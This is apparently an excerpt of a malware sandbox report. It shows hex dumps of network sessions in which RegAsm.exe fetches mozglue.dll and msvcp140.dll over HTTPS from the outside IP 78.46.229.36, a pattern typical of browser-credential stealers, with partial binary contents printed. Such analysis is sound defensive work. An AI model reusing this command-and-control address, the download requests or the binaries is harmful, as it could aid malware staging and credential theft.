                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                                                                                                                                                                                  Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                                                                                                                                                                                  Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                                                                                                                                                                                  Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                                                                                                                                                                                  Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                                                                  Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                                                                  Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                                                                                                                                                                                  Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                                  2024-03-29 11:08:05 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                                  Data Ascii: 0<48%8A)$(


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  12192.168.2.44975478.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:08 UTC205OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:08 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:08 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 608080
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  ETag: "6315a9f4-94750"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-03-29 11:08:08 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                                  2024-03-29 11:08:08 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                                                                                                                                                                                  Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                                                                                                                                                                                  2024-03-29 11:08:08 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                                                                                                                                                                                  Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                                                                                                                                                                                  2024-03-29 11:08:08 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                                                                                                                                                                                  Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                                                                                                                                                                                  2024-03-29 11:08:08 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                                                                                                                                                                                  Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                                                                                                                                                                                  2024-03-29 11:08:08 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                                                                  Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                                                                  2024-03-29 11:08:08 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                                                                  Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                                                                  2024-03-29 11:08:09 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                                                                                                                                                                                  Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                                                                  2024-03-29 11:08:09 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                                                                  Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                                                                  2024-03-29 11:08:09 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                                                                  Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  13192.168.2.44975578.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:09 UTC206OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:10 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:10 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 450024
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  ETag: "6315a9f4-6dde8"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-03-29 11:08:10 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
